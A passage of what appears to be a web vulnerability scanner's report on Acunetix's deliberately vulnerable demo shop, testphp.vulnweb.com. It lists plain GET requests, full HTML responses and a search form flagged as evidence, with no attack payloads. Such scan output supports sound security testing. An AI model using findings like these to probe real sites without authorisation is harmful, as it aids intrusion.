<li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/guestbook.php |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 264 bytes. |
GET http://testphp.vulnweb.com/guestbook.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5390 |
Response Body - size: 5,390 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>guestbook</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong></strong></td><td align="right" style="background-color:#F5F5F5">12.13.2022, 4:16 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif"> </td></tr></table> </div> <div class="story"> <form action="" method="post" name="faddentry"> <input type="hidden" name="name" value="anonymous user"> <textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea> <br> <input type="submit" name="submit" value="add message"> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/index.php |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 260 bytes. |
GET http://testphp.vulnweb.com/index.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:44 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4958 |
Response Body - size: 4,958 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of Acunetix Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for Acunetix WVS.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?artist=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 297 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 7994 |
Response Body - size: 7,994 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>r4w8173</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=6'><h3>Thing</h3></a><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=6','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?artist=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 297 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5193 |
Response Body - size: 5,193 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Blad3</h2><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?artist=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 297 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=3 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p 